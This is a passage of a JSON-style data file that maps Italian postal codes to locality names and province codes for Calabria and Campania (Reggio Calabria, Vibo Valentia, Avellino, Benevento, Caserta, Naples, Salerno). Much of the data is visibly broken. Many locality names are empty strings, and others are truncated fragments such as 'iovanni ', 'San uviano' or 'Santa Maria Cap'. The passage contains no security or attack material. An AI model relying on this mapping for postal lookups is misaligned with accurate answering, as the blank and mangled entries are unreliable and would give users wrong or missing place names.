"RC"]], "89026": [["", "RC"]], "89027": [["", "RC"]], "89028": [["Seminara", "RC"], ["Barritteri", "RC"], ["Sant'Anna", "RC"], ["", "RC"]], "89029": [ ["", "RC"], ["Taurianova", "RC"], ["", "RC"], ["", "RC"], ], "89030": [ ["Condofuri", "RC"], ["Benestare", "RC"], ["", "RC"], ["Staiti", "RC"], ["Motticella", "RC"], ["Ferruzzano", "RC"], ["Careri", "RC"], ["Casignana", "RC"], ["Belloro", "RC"], ["", "RC"], ["", "RC"], ["", "RC"], ["", "RC"], ["", "RC"], ["", "RC"], ["Samo", "RC"], ["Africo", "RC"], ["Natile", "RC"], ["Canalello", "RC"], ["", "RC"], ["", "RC"], ], "89031": [["Bombile", "RC"], ["", "RC"], ["Ardore", "RC"]], "89032": [["Pardesca", "RC"], ["Bianco", "RC"]], "89033": [["Bova", "RC"]], "89034": [ ["", "RC"], ["", "RC"], ["Bovalino", "RC"], ["", "RC"], ], "89035": [["", "RC"]], "89036": [["", "RC"], ["", "RC"], ["Galati", "RC"], ["Brancaleone", "RC"]], "89037": [["", "RC"], ["", "RC"]], "89038": [["", "RC"], ["Palizzi", "RC"], ["", "RC"], ["Pietrapennata", "RC"]], "89039": [["Plati'", "RC"]], "89040": [ ["Monasterace", "RC"], ["Martone", "RC"], ["Stignano", "RC"], ["", "RC"], ["", "RC"], ["", "RC"], ["Riace", "RC"], ["Canolo", "RC"], ["", "RC"], ["Gerace", "RC"], ["", "RC"], ["Cimina'", "RC"], ["Bivongi", "RC"], ["", "RC"], ["Condojanni", "RC"], ["Pazzano", "RC"], ["", "RC"], ["Antonimina", "RC"], ["Cirella", "RC"], ["Placanica", "RC"], ["", "RC"], ["Camini", "RC"], ["Portigliola", "RC"], ], "89041": [ ["", "RC"], ["Ursini", "RC"], ["", "RC"], ["", "RC"], ["Caulonia", "RC"], ], "89042": [["Gioiosa Ionica", "RC"]], "89043": [["Grotteria", "RC"], ["", "RC"]], "89044": [["Merici", "RC"], ["", "RC"], ["Moschetta", "RC"], ["Locri", "RC"]], "89045": [["Mammola", "RC"]], "89046": [["", "RC"]], "89047": [["Roccella Ionica", "RC"]], "89048": [["Siderno Superiore", "RC"], ["Donisi", "RC"], ["Siderno", "RC"], ["", "RC"]], "89049": [["Stilo", "RC"]], "89050": [ ["", "RC"], ["Cosoleto", "RC"], ["Fiumara", "RC"], ["", "RC"], 
["Sant'Alessio In Aspromonte", "RC"], ["", "RC"], ["Colelli", "RC"], ["Sitizano", "RC"], ["Laganadi", "RC"], ["Acquacalda", "RC"], ["Plaesano", "RC"], ["Calanna", "RC"], ], "89052": [["Campo Calabro", "RC"]], "89054": [["Galatro", "RC"]], "89056": [["Lubrichi", "RC"], ["", "RC"]], "89057": [[" In Aspromonte", "RC"], ["Gambarie", "RC"]], "89058": [["Scilla", "RC"], ["Favazzina", "RC"], ["Milea", "RC"], ["Melia", "RC"]], "89060": [ ["", "RC"], ["Ghorio", "RC"], ["Bagaladi", "RC"], ["Cardeto", "RC"], ["", "RC"], ["Roghudi", "RC"], ["", "RC"], ], "89062": [["Lazzaro", "RC"]], "89063": [ ["", "RC"], ["Anna'", "RC"], ["Pentedattilo", "RC"], ["Caredia", "RC"], ["Lacco", "RC"], ["Prunella", "RC"], ], "89064": [["Masella", "RC"], ["", "RC"], ["", "RC"], ["", "RC"]], "89065": [["", "RC"]], "89069": [ ["", "RC"], ["", "RC"], ["Chorio", "RC"], ["", "RC"], ["", "RC"], ], "89100": [["", "RC"]], "89121": [["", "RC"], ["Archi", "RC"], ["Santa Caterina", "RC"]], "89122": [["Vito", "RC"], ["", "RC"]], "89123": [["", "RC"]], "89124": [["", "RC"], ["Eremo", "RC"]], "89125": [["", "RC"]], "89126": [ ["Orti'", "RC"], ["", "RC"], ["Cerasi", "RC"], ["Arasi'", "RC"], ["Trizzino", "RC"], ["Schindilifa'", "RC"], ["Terreti", "RC"], ["", "RC"], ["Podargoni", "RC"], ["In V", "RC"], ["Trabocchetto", "RC"], ["Orti' Superiore", "RC"], ["Orti' Inferiore", "RC"], ], "89127": [["", "RC"]], "89128": [["", "RC"], ["Spirito Santo", "RC"]], "89129": [["", "RC"]], "89131": [["", "RC"], ["Armo", "RC"], ["Ravagnese", "RC"], ["Gallina", "RC"], ["Puzzi", "RC"]], "89132": [["", "RC"]], "89133": [ ["", "RC"], ["Cataforio", "RC"], ["Mosorrofa", "RC"], ["Sbarre", "RC"], ["", "RC"], ["San Salvatore", "RC"], ["Pavigliana", "RC"], ["Cannavo'", "RC"], ["Vinco", "RC"], ["", "RC"], ], "89134": [ ["", "RC"], ["", "RC"], ["Bocale", "RC"], ["Pellaro", "RC"], ["", "RC"], ], "89135": [ ["", "RC"], ["Diminniti", "RC"], ["Sambatello", "RC"], ["Rosali'", "RC"], ["Gallico", "RC"], ["", "RC"], ["", "RC"], ["Catona", "RC"], ], "89812": [["Pizzo", "VV"], ["", "VV"]], "89813": [["Polia", "VV"], ["Menniti", "VV"], ["Trecroci", "VV"]], "89814": [["Montesoro", "VV"], ["Scarro", "VV"], ["Filadelfia", "VV"]], "89815": [["", "VV"]], "89816": [["Cessaniti", "VV"], ["", "VV"], ["Favelloni", "VV"], ["Pannaconi", "VV"]], "89817": [ ["Sciconi", "VV"], ["Paradisoni", "VV"], ["Potenzoni", "VV"], ["San Costantino", "VV"], ["", "VV"], ["Briatico", "VV"], ], "89818": [["Capistrano", "VV"]], "89819": [["", "VV"]], "89821": [["Vallelonga", "VV"], ["", "VV"]], "89822": [["Brognaturo", "VV"], ["", "VV"], ["Simbario", "VV"], ["Spadola", "VV"]], "89823": [["Mongiana", "VV"], ["Fabrizia", "VV"]], "89824": [["Nardodipace", "VV"]], "89831": [ ["Sant'Angelo", "VV"], ["Sorianello", "VV"], ["", "VV"], ["", "VV"], ["Gerocarne", "VV"], ["Ciano", "VV"], ], "89832": [["Limpidi", "VV"], ["Acquaro", "VV"], ["Arena", "VV"], ["Dasa'", "VV"]], "89833": [["", "VV"], ["Monsoreto", "VV"], ["Dinami", "VV"]], "89834": [["Vazzano", "VV"], ["Pizzoni", "VV"]], "89841": [ ["Rombiolo", "VV"], ["Presinaci", "VV"], ["Moladi", "VV"], ["Pernocari", "VV"], ["Arzona", "VV"], ["Filandari", "VV"], ["Pizzinni", "VV"], ], "89842": [["San Calogero", "VV"], ["", "VV"]], "89843": [["Stefanaconi", "VV"], ["Sant'Onofrio", "VV"], ["Filogaso", "VV"], ["Maierato", "VV"]], "89844": [ ["Badia", "VV"], ["Limbadi", "VV"], ["Mandaradoni", "VV"], ["", "VV"], ["Nicotera", "VV"], ["Preitoni", "VV"], ["", "VV"], ["Comerconi", "VV"], ["Caroni", "VV"], ], "89851": [["Jonadi", "VV"], ["", "VV"], ["Nao", "VV"], ["Francica", "VV"]], 
"89852": [["Mileto", "VV"], ["Paravati", "VV"], ["", "VV"], ["Comparni", "VV"]], "89853": [["", "VV"]], "89861": [["Tropea", "VV"], ["Parghelia", "VV"], ["Fitili", "VV"]], "89862": [["Drapia", "VV"], ["Gasponi", "VV"], ["Caria", "VV"], ["Brattiro'", "VV"]], "89863": [["Coccorino", "VV"], ["Joppolo", "VV"], ["Caroniti", "VV"]], "89864": [["Panaia", "VV"], ["Spilinga", "VV"]], "89866": [ ["Barbalaconi", "VV"], ["San Nicolo' Di Ricadi", "VV"], ["Santa Domenica Ricadi", "VV"], ["San Nicolo'", "VV"], ["Santa Domenica", "VV"], ["Lampazzone", "VV"], ["Ricadi", "VV"], ], "89867": [["Zaccanopoli", "VV"], ["Zungri", "VV"]], "89868": [["Zambrone", "VV"], ["Daffina'", "VV"], ["iovanni ", "VV"]], "89900": [ ["Longobardi", "VV"], ["", "VV"], ["", "VV"], ["", "VV"], ["Vena", "VV"], ["", "VV"], ["Piscopio", "VV"], ["", "VV"], ["Triparni", "VV"], ], "83010": [ ["Grottolella", "AV"], ["", "AV"], ["Torrioni", "AV"], ["Summonte", "AV"], ["Tufo", "AV"], ["Starze", "AV"], ["", "AV"], ["", "AV"], ["Chianche", "AV"], ["", "AV"], ["", "AV"], ], "83011": [["", "AV"]], "83012": [["Cervinara", "AV"], ["Trescine", "AV"], ["Ioffredo", "AV"]], "83013": [ ["", "AV"], ["Mercogliano", "AV"], ["Torelli", "AV"], ["", "AV"], ["Torrette", "AV"], ], "83014": [["", "AV"]], "83015": [["Pietrastornina", "AV"], ["", "AV"]], "83016": [["", "AV"], ["Roccabascerana", "AV"], ["Squillani", "AV"], ["", "AV"]], "83017": [["", "AV"], ["Rotondi", "AV"]], "83018": [["", "AV"]], "83020": [ ["", "AV"], ["", "AV"], ["Domicella", "AV"], ["Petruro", "AV"], ["Quadrelle", "AV"], ["Celzi", "AV"], ["", "AV"], ["Forino", "AV"], ["Cesinali", "AV"], ["", "AV"], ["", "AV"], ["Taurano", "AV"], ["Contrada", "AV"], ["Moschiano", "AV"], ["Sperone", "AV"], ["Casola", "AV"], ["", "AV"], ["Quindici", "AV"], ["Sirignano", "AV"], ], "83021": [["Avella", "AV"]], "83022": [["Baiano", "AV"]], "83023": [["Lauro", "AV"], ["Fontenovella", "AV"], ["Migliano", "AV"]], "83024": [["", "AV"], ["Molinelle", "AV"]], "83025": [ ["Borgo Di Montoro Inferiore", "AV"], ["Montoro", "AV"], ["Preturo", "AV"], ["Aterrana", "AV"], ["Caliano", "AV"], ["Torchiati", "AV"], ["", "AV"], ["Figlioli", "AV"], ["Borgo", "AV"], ["Piano", "AV"], ["San Pietro", "AV"], ["Banzano", "AV"], ["Misciano", "AV"], ["Montoro Superiore", "AV"], ["Montoro Inferiore", "AV"], ], "83026": [["San Pietro Di Montoro Superiore", "AV"], ["Banzano Di Montoro Superiore", "AV"]], "83027": [["", "AV"]], "83028": [ ["Serino", "AV"], ["Sala", "AV"], ["", "AV"], ["Canale", "AV"], ["", "AV"], ["", "AV"], ], "83029": [["", "AV"], ["", "AV"], ["Solofra", "AV"]], "83030": [ ["", "AV"], ["", "AV"], ["Venticano", "AV"], ["Campanarello", "AV"], ["Montefredane", "AV"], ["Lapio", "AV"], ["Zungoli", "AV"], ["Prata Di Principato Ultra", "AV"], ["", "AV"], ["Montefusco", "AV"], ["Dentecane", "AV"], ["", "AV"], ["Manocalzati", "AV"], ["Arcella", "AV"], ["Serra", "AV"], ["Pietradefusi", "AV"], ["", "AV"], ["", "AV"], ["Montaguto", "AV"], ["Greci", "AV"], ["Montefalcione", "AV"], ["", "AV"], ["", "AV"], ["", "AV"], ["Taurasi", "AV"], ["", "AV"], ], "83031": [ ["", "AV"], ["Palazzisi", "AV"], ["", "AV"], ["", "AV"], ["", "AV"], ["Orneta", "AV"], ], "83032": [["Morroni", "AV"], ["Bonito", "AV"]], "83034": [["Casalbore", "AV"]], "83035": [["Grottaminarda", "AV"], ["Carpignano", "AV"]], "83036": [["Calore", "AV"], ["Pianopantano", "AV"], ["", "AV"], ["", "AV"]], "83037": [["", "AV"]], "83038": [["Montemiletto", "AV"], ["Montaperto", "AV"]], "83039": [ ["Serra", "AV"], ["", "AV"], ["", "AV"], ["", "AV"], ["", "AV"], ], "83040": [ ["", "AV"], 
["", "AV"], ["Fontanarosa", "AV"], ["Carife", "AV"], ["Alvano", "AV"], ["Materdomini", "AV"], ["", "AV"], ["Andretta", "AV"], ["Castelfranci", "AV"], ["", "AV"], ["Mattinella", "AV"], ["Cairano", "AV"], ["Gesualdo", "AV"], ["", "AV"], ["", "AV"], ["Luogosano", "AV"], ["", "AV"], ["Quaglietta", "AV"], ["Frigento", "AV"], ["Flumeri", "AV"], ["Calabritto", "AV"], ["Montemarano", "AV"], ["Caposele", "AV"], ["", "AV"], ["Candida", "AV"], ["Pagliara", "AV"], ], "83041": [["Aquilonia", "AV"]], "83042": [["Atripalda", "AV"]], "83043": [["Laceno", "AV"], ["", "AV"], ["", "AV"]], "83044": [["", "AV"], ["", "AV"], ["Bisaccia", "AV"]], "83045": [["Calitri", "AV"]], "83046": [["Lacedonia", "AV"]], "83047": [["Lioni", "AV"]], "83048": [["", "AV"], ["", "AV"], ["Montella", "AV"]], "83049": [["Monteverde", "AV"]], "83050": [ ["", "AV"], ["", "AV"], ["", "AV"], ["", "AV"], ["Parolise", "AV"], ["", "AV"], ["", "AV"], ["", "AV"], ["Scampitella", "AV"], ["", "AV"], ["", "AV"], ["Villamaina", "AV"], ["", "AV"], ["Vallesaccarda", "AV"], ["Senerchia", "AV"], ], "83051": [["Ponteromito", "AV"], ["Nusco", "AV"]], "83052": [["Paternopoli", "AV"]], "83053": [["", "AV"]], "83054": [["", "AV"], ["San Vito", "AV"], ["San Vito Dei Lombardi", "AV"]], "83055": [["Sturno", "AV"]], "83056": [["Teora", "AV"]], "83057": [["", "AV"]], "83058": [["Trevico", "AV"], ["Molini", "AV"]], "83059": [["Vallata", "AV"]], "83100": [["Avellino", "AV"], ["", "AV"], ["", "AV"], ["Picarelli", "AV"]], "82010": [ ["Moiano", "BN"], ["", "BN"], ["Ripabianca", "BN"], ["Beltiglio", "BN"], ["", "BN"], ["Perrillo", "BN"], ["Iannassi", "BN"], ["", "BN"], ["Motta", "BN"], ["Bucciano", "BN"], ["", "BN"], ["Maccoli", "BN"], ["", "BN"], ["Luzzano", "BN"], ["Bagnara", "BN"], ["Arpaise", "BN"], ["Pastene", "BN"], ["", "BN"], ["Montorsi", "BN"], ["Monterocchetta", "BN"], ["Terranova", "BN"], ["", "BN"], ["Pagliara", "BN"], ["", "BN"], ["Ceppaloni", "BN"], ["Cavuoti", "BN"], ["", "BN"], ], "82011": [["Forchia", "BN"], ["Arpaia", "BN"], ["Paolisi", "BN"], ["Airola", "BN"]], "82013": [["Bonea", "BN"]], "82015": [["Durazzano", "BN"]], "82016": [["Cirignano", "BN"], ["Varoni", "BN"], ["Montesarchio", "BN"]], "82017": [["Pannarano", "BN"]], "82018": [ ["", "BN"], ["Calvi", "BN"], ["Cubante", "BN"], ["San ", "BN"], ["", "BN"], ], "82019": [["Bagnoli", "BN"], ["Faggiano", "BN"], ["", "BN"], ["Laiano", "BN"]], "82020": [ ["", "BN"], ["", "BN"], ["", "BN"], ["Circello", "BN"], ["Santa Croce Del Sannio", "BN"], ["Paduli", "BN"], ["Campolattaro", "BN"], ["", "BN"], ["", "BN"], ["", "BN"], ["Reino", "BN"], ["Pietrelcina", "BN"], ["Baselice", "BN"], ["Foiano Di Val Fortore", "BN"], ["Molinara", "BN"], ["Buonalbergo", "BN"], ], "82021": [["Apice Nuovo", "BN"], ["Apice", "BN"], ["", "BN"]], "82022": [["Castelfranco In Miscano", "BN"]], "82023": [["Castelvetere In Val Fortore", "BN"]], "82024": [["", "BN"], ["Castelpagano", "BN"], ["Decorata", "BN"]], "82025": [["Montefalcone Di Val Fortore", "BN"]], "82026": [["Sassinoro", "BN"], ["Morcone", "BN"], ["Cuffiano", "BN"]], "82027": [["Giallonardo", "BN"], ["Casalduni", "BN"], ["Pontelandolfo", "BN"]], "82028": [["", "BN"]], "82029": [["", "BN"]], "82030": [ ["Torrecuso", "BN"], ["Pietraroja", "BN"], ["Limatola", "BN"], ["Ponte", "BN"], ["Melizzano", "BN"], ["Dugenta", "BN"], ["", "BN"], ["Foglianise", "BN"], ["Castelpoto", "BN"], ["Paupisi", "BN"], ["", "BN"], ["Biancano", "BN"], ["Massa", "BN"], ["Apollosa", "BN"], ["Giardoni", "BN"], ["", "BN"], ["", "BN"], ["", "BN"], ["", "BN"], ["Cautano", "BN"], ["Faicchio", "BN"], 
["Cacciano", "BN"], ["Torello", "BN"], ["Puglianello", "BN"], ["", "BN"], ], "82031": [["Amorosi", "BN"]], "82032": [["", "BN"]], "82033": [["", "BN"], ["", "BN"]], "82034": [["", "BN"], ["", "BN"], ["", "BN"]], "82036": [["Solopaca", "BN"]], "82037": [["", "BN"], ["Castelvenere", "BN"]], "82038": [["Vitulano", "BN"]], "82100": [["Benevento", "BN"], ["Perrillo", "BN"], ["Pastene", "BN"]], "81010": [ ["Letino", "CE"], ["Torcino", "CE"], ["Squille", "CE"], ["", "CE"], ["", "CE"], ["Dragoni", "CE"], ["Carattano", "CE"], ["", "CE"], ["Calvisi", "CE"], ["", "CE"], ["", "CE"], ["Ailano", "CE"], ["Vallelunga", "CE"], ["Ciorlano", "CE"], ["", "CE"], ["Pratella", "CE"], ["Alvignanello", "CE"], ["", "CE"], ["", "CE"], ["", "CE"], ["Ruviano", "CE"], ], "81011": [["Totari", "CE"], ["Alife", "CE"]], "81012": [["Alvignano", "CE"], ["", "CE"]], "81013": [ ["", "CE"], ["", "CE"], ["", "CE"], ["Caiazzo", "CE"], ], "81014": [["Fontegreca", "CE"], ["", "CE"]], "81016": [ ["", "CE"], ["", "CE"], ["", "CE"], ["", "CE"], ["Sepicciano", "CE"], ], "81017": [["Quattroventi", "CE"], ["", "CE"], ["Raviscanina", "CE"]], "81020": [ ["", "CE"], ["Capodrise", "CE"], ["Casapulla", "CE"], ["", "CE"], ["", "CE"], ["", "CE"], ["Annunziata", "CE"], ["Recale", "CE"], ], "81021": [["Arienzo", "CE"]], "81022": [["Casagiove", "CE"]], "81023": [["Messercola", "CE"], ["Cervino", "CE"], ["", "CE"]], "81024": [["Grotticella", "CE"], ["Montedecoro", "CE"], ["Maddaloni", "CE"]], "81025": [["Cantone", "CE"], ["Marcianise", "CE"]], "81027": [ ["", "CE"], ["", "CE"], ["Cave", "CE"], ["", "CE"], ["", "CE"], ["Polvica", "CE"], ], "81028": [["", "CE"]], "81030": [ ["Arnone", "CE"], ["", "CE"], ["Teverola", "CE"], ["", "CE"], ["", "CE"], ["", "CE"], ["Carinola", "CE"], ["Frignano", "CE"], ["", "CE"], ["Cesa", "CE"], ["", "CE"], ["Sant'Arpino", "CE"], ["Succivo", "CE"], ["", "CE"], ["Casale", "CE"], ["Cellole", "CE"], ["Lusciano", "CE"], ["Casaluce", "CE"], ["Nocelleto", "CE"], ["Cancello", "CE"], ["", "CE"], ["Parete", "CE"], ["Casanova", "CE"], ["", "CE"], ["", "CE"], ["Casapesenna", "CE"], ], "81031": [["Aversa", "CE"]], "81032": [["Carinaro", "CE"]], "81033": [["", "CE"]], "81034": [["Mondragone", "CE"]], "81035": [ ["Gallo", "CE"], ["Ameglio", "CE"], ["Roccamonfina", "CE"], ["", "CE"], ["Fontanafredda", "CE"], ["Campagnola", "CE"], ["Filorsi", "CE"], ["Garofali", "CE"], ["Grottola", "CE"], ], "81036": [["'Aversa", "CE"]], "81037": [ ["", "CE"], ["Corigliano", "CE"], ["", "CE"], ["", "CE"], ["", "CE"], ["Sant'Agata", "CE"], ["Carano", "CE"], ["Fasani", "CE"], ["", "CE"], ["", "CE"], ["", "CE"], ["San Carlo Di Sessa Aurunca", "CE"], ["Fontanaradina", "CE"], ["San Martino Di Sessa Aurunca", "CE"], ["", "CE"], ["", "CE"], ["", "CE"], ["Piedimonte", "CE"], ["Cupa", "CE"], ["Valogno", "CE"], ["Cascano", "CE"], ], "81038": [["", "CE"]], "81039": [["", "CE"], ["", "CE"]], "81040": [ ["", "CE"], ["Cisterna", "CE"], ["", "CE"], ["", "CE"], ["Treglia", "CE"], ["Formicola", "CE"], ["Curti", "CE"], ["", "CE"], ["Pontelatone", "CE"], ["Pietravairano", "CE"], ["Cocuruzzo", "CE"], ["Camino", "CE"], ["Liberi", "CE"], ["", "CE"], ["", "CE"], ["", "CE"], ["", "CE"], ], "81041": [["Vitulazio", "CE"], ["Bellona", "CE"]], "81042": [ ["", "CE"], ["Petrulo", "CE"], ["Pozzillo", "CE"], ["", "CE"], ["", "CE"], ["", "CE"], ["Petrullo", "CE"], ["Visciano", "CE"], ], "81043": [["Capua", "CE"], ["", "CE"]], "81044": [ ["", "CE"], ["Tora", "CE"], ["Piccilli", "CE"], ["Orchi", "CE"], ["", "CE"], ["Sipicciano", "CE"], ["Galluccio", "CE"], ["", "CE"], ["Cave", "CE"], 
["Vaglie", "CE"], ], "81046": [["Grazzanise", "CE"], ["Brezza", "CE"], ["", "CE"], ["", "CE"]], "81047": [["", "CE"], ["Caturano", "CE"]], "81049": [["", "CE"], ["San Pietro Infine", "CE"], ["Caspoli", "CE"]], "81050": [ ["", "CE"], ["", "CE"], ["Musicile", "CE"], ["", "CE"], ["Montanaro", "CE"], ["Pastorano", "CE"], ["Francolise", "CE"], ["Ciamprisco", "CE"], ["", "CE"], ["Pantuliano", "CE"], ["Camigliano", "CE"], ["", "CE"], ["Presenzano", "CE"], ], "81051": [["Roccaromana", "CE"], ["Statigliano", "CE"], ["Pietramelara", "CE"]], "81052": [["", "CE"]], "81053": [["Riardo", "CE"]], "81054": [["San Prisco", "CE"]], "81055": [["Santa Maria Cap", "CE"]], "81056": [["Sparanise", "CE"]], "81057": [ ["San Marco", "CE"], ["", "CE"], ["Furnolo", "CE"], ["Pugliano", "CE"], ["Casamostra", "CE"], ["Teano", "CE"], ["Casafredda", "CE"], ["Versano", "CE"], ["Fontanelle", "CE"], ["Casi", "CE"], ["Casale", "CE"], ["", "CE"], ], "81058": [ ["Vairano", "CE"], ["", "CE"], ["Patenora", "CE"], ["Marzanello", "CE"], ["", "CE"], ], "81059": [["", "CE"], ["Caianello", "CE"], ["", "CE"], ["Montano", "CE"]], "81100": [ ["Casolla", "CE"], ["Tredici", "CE"], ["Staturano", "CE"], ["Briano", "CE"], ["Tuoro", "CE"], ["Ercole", "CE"], ["Mezzano", "CE"], ["Caserta", "CE"], ["Falciano", "CE"], ["", "CE"], ["Puccianiello", "CE"], ["Vaccheria", "CE"], ["Centurano", "CE"], ["", "CE"], ["Casola", "CE"], ["", "CE"], ["", "CE"], ["", "CE"], ["Casertavecchia", "CE"], ["", "CE"], ], "80010": [["Scalzapecora", "NA"], ["Quarto", "NA"], ["Torretta", "NA"], ["Villaricca", "NA"]], "80011": [["Pezzalunga", "NA"], ["Acerra", "NA"]], "80012": [["Calvizzano", "NA"]], "80013": [ ["", "NA"], ["Tavernanova", "NA"], ["", "NA"], ["Casarea", "NA"], ], "80014": [["", "NA"], ["Varcaturo", "NA"], ["", "NA"]], "80016": [["", "NA"], ["", "NA"], ["", "NA"]], "80017": [["", "NA"]], "80018": [["", "NA"]], "80019": [["Qualiano", "NA"]], "80020": [["Crispano", "NA"], ["", "NA"], ["Casavatore", "NA"], ["Frattaminore", "NA"]], "80021": [["Afragola", "NA"]], "80022": [["Arzano", "NA"]], "80023": [["Pascarola", "NA"], ["Caivano", "NA"]], "80024": [["Carditello", "NA"], ["Cardito", "NA"]], "80025": [["Casandrino", "NA"]], "80026": [["Arpino", "NA"], ["Casoria", "NA"]], "80027": [["Frattamaggiore", "NA"]], "80028": [["", "NA"]], "80029": [["Sant'Antimo", "NA"]], "80030": [ ["", "NA"], ["Camposano", "NA"], ["Cimitile", "NA"], ["", "NA"], ["Visciano", "NA"], ["Spartimento", "NA"], ["Gallo", "NA"], ["", "NA"], ["Comiziano", "NA"], ["Gargani", "NA"], ["Mariglianella", "NA"], ["Schiava", "NA"], ["Scisciano", "NA"], ["Liveri", "NA"], ["Tufino", "NA"], ["San Paolo Bel Sito", "NA"], ["Roccarainola", "NA"], ], "80031": [["Brusciano", "NA"]], "80032": [["Casamarciano", "NA"]], "80033": [["Cicciano", "NA"]], "80034": [["Marigliano", "NA"], ["Faibano", "NA"], ["Lausdomini", "NA"], ["Selva", "NA"], ["Casaferro", "NA"]], "80035": [["Nola", "NA"], ["Polvica", "NA"], ["Piazzolla", "NA"], ["Cinquevie", "NA"], ["Pollastri", "NA"]], "80036": [["", "NA"], ["", "NA"], ["Vico", "NA"], ["Castello", "NA"]], "80038": [["", "NA"]], "80039": [["Saviano", "NA"], ["", "NA"]], "80040": [ ["Volla", "NA"], ["", "NA"], ["San uviano", "NA"], ["Flocco", "NA"], ["Caravita", "NA"], ["Terzigno", "NA"], ["", "NA"], ["Musci", "NA"], ["Trecase", "NA"], ["Poggiomarino", "NA"], ["Cercola", "NA"], [" Al Vesuvio", "NA"], ["Striano", "NA"], ["", "NA"], ], "80041": [["Boscoreale", "NA"], ["Marchesa", "NA"]], "80042": [["Boscotrecase", "NA"]], "80044": [["Ottaviano", "NA"], ["San Gennarello", "NA"]], 
"80045": [["Mariconda", "NA"], ["Messigno", "NA"], ["Pompei", "NA"], ["", "NA"]], "80046": [["", "NA"]], "80047": [["Santa Maria La Scala", "NA"], ["", "NA"], ["Casilli", "NA"]], "80048": [ ["", "NA"], ["", "NA"], ["", "NA"], ["Sant'Anastasia", "NA"], ], "80049": [["", "NA"]], "80050": [ ["'", "NA"], ["Pimonte", "NA"], ["Pia", "NA"], ["Tralia", "NA"], ["Franche", "NA"], ["Piazza", "NA"], ["", "NA"], ["San Nicola", "NA"], ["Lettere", "NA"], ], "80051": [["Agerola", "NA"], ["Pianillo", "NA"], ["", "NA"], ["Bomerano", "NA"]], "80053": [ ["", "NA"], ["Scanzano", "NA"], ["", "NA"], ["Quisisana", "NA"], ], "80054": [["Caprile", "NA"], ["Gragnano", "NA"]], "80055": [["Portici", "NA"], ["Bellavista", "NA"]], "80056": [["Ercolano", "NA"], ["Resina", "NA"]], "80057": [["", "NA"]], "80058": [["", "NA"]], "80059": [["", "NA"], ["Leopardi", "NA"], ["", "NA"]], "80060": [["Massaquano", "NA"], ["", "NA"]], "80061": [ ["", "NA"], ["Nerano", "NA"], ["", "NA"], ["Termini", "NA"], ["", "NA"], ], "80062": [["Meta", "NA"]], "80063": [["", "NA"]], "80065": [["Sant'Agnello", "NA"], ["", "NA"]], "80066": [["Seiano", "NA"], ["Fornacelle", "NA"], ["Montechiaro", "NA"], ["Fornacella", "NA"]], "80067": [["Priora", "NA"], ["", "NA"], ["Sorrento", "NA"]], "80069": [["Moiano", "NA"], ["", "NA"], ["", "NA"]], "80070": [ ["Buonopane", "NA"], ["Succhivo", "NA"], ["Fontana", "NA"], ["Miliscola", "NA"], ["", "NA"], ["", "NA"], ["Serrara", "NA"], ["Fusaro", "NA"], ["Torregaveta", "NA"], ["Bacoli", "NA"], ["", "NA"], ["Miseno", "NA"], ["Sant'Angelo", "NA"], ["", "NA"], ["", "NA"], ["Cappella", "NA"], ["Cuma", "NA"], ["Baia", "NA"], ], "80071": [["Anacapri", "NA"]], "80073": [["", "NA"], ["Capri", "NA"]], "80074": [["", "NA"]], "80075": [["Forio", "NA"], ["Panza", "NA"], ["Monterone", "NA"]], "80076": [["", "NA"]], "80077": [ ["", "NA"], ["", "NA"], ["", "NA"], ["Ischia", "NA"], ["", "NA"], ["", "NA"], ], "80078": [ ["Pozzuoli", "NA"], ["Lucrino", "NA"], ["", "NA"], ["Monterusciello", "NA"], ["", "NA"], ["Cappuccini", "NA"], ["", "NA"], ["Licola", "NA"], ], "80079": [["Procida", "NA"]], "80100": [["Napoli", "NA"]], "80121": [["Napoli", "NA"]], "80122": [["Napoli", "NA"], ["Chiaia", "NA"]], "80123": [["Napoli", "NA"]], "80124": [["Napoli", "NA"], ["Bagnoli", "NA"]], "80125": [["Napoli", "NA"], ["Agnano", "NA"]], "80126": [["Pianura", "NA"], ["Napoli", "NA"], ["Soccavo", "NA"]], "80127": [["Vomero", "NA"], ["Napoli", "NA"]], "80128": [["Napoli", "NA"]], "80129": [["Napoli", "NA"]], "80131": [["Napoli", "NA"], ["Miano", "NA"], ["Arenella", "NA"], ["", "NA"]], "80132": [["Napoli", "NA"]], "80133": [["Napoli", "NA"]], "80134": [["Napoli", "NA"]], "80135": [["Napoli", "NA"]], "80136": [["Napoli", "NA"]], "80137": [["Napoli", "NA"]], "80138": [["Napoli", "NA"]], "80139": [["Napoli", "NA"]], "80141": [["Napoli", "NA"]], "80142": [["Napoli", "NA"]], "80143": [["Napoli", "NA"]], "80144": [["Napoli", "NA"], ["", "NA"], ["Secondigliano", "NA"]], "80145": [ ["Marianella", "NA"], ["", "NA"], ["Scampia", "NA"], ["Miano", "NA"], ["Piscinola", "NA"], ["Napoli", "NA"], ], "80146": [["Napoli", "NA"], ["", "NA"]], "80147": [["Barra", "NA"], ["Ponticelli", "NA"], ["Napoli", "NA"]], "84010": [ ["Atrani", "SA"], ["Ravello", "SA"], ["Cetara", "SA"], ["", "SA"], ["Minori", "SA"], ["Corbara", "SA"], ["Tramonti", "SA"], ["", "SA"], ["Praiano", "SA"], ["Furore", "SA"], ["Campinola", "SA"], ["", "SA"], ["", "SA"], ["Pontone", "SA"], ["", "SA"], ["Scala", "SA"], ["Erchie", "SA"], ["Maiori", "SA"], ["", "SA"], ], "84011": [ ["Pastena", "SA"], ["", "SA"], 
["Pogerola", "SA"], ["", "SA"], ["Lone", "SA"], ["Amalfi", "SA"], ], "84012": [["Angri", "SA"]], "84013": [ ["", "SA"], ["Passiano", "SA"], ["San Pietro Di Cava", "SA"], ["", "SA"], ["", "SA"], ["Pregiato", "SA"], ["Arcara", "SA"], ["", "SA"], ["Dupino", "SA"], ["Alessia", "SA"], ["Marini", "SA"], ], "84014": [["Nocera Inferiore", "SA"]], "84015": [["Nocera Superiore", "SA"], ["Materdomini Di Nocera", "SA"]], "84016": [["Pagani", "SA"]], "84017": [["Positano", "SA"], ["Montepertuso", "SA"]], "84018": [["San Pietro Di Scafati", "SA"], ["Scafati", "SA"]], "84019": [ ["Benincasa", "SA"], ["Raito", "SA"], ["", "SA"], ["Dragonea", "SA"], ["", "SA"], ["", "SA"], ["Molina", "SA"], ], "84020": [ ["", "SA"], ["Controne", "SA"], ["Santomenna", "SA"], ["Ottati", "SA"], ["Valva", "SA"], ["Colliano", "SA"], ["", "SA"], ["Aquara", "SA"], ["Perrazze", "SA"], ["Bellosguardo", "SA"], ["Ricigliano", "SA"], ["", "SA"], ["Palomonte", "SA"], ["", "SA"], ["Salvitelle", "SA"], ["", "SA"], ["Laviano", "SA"], 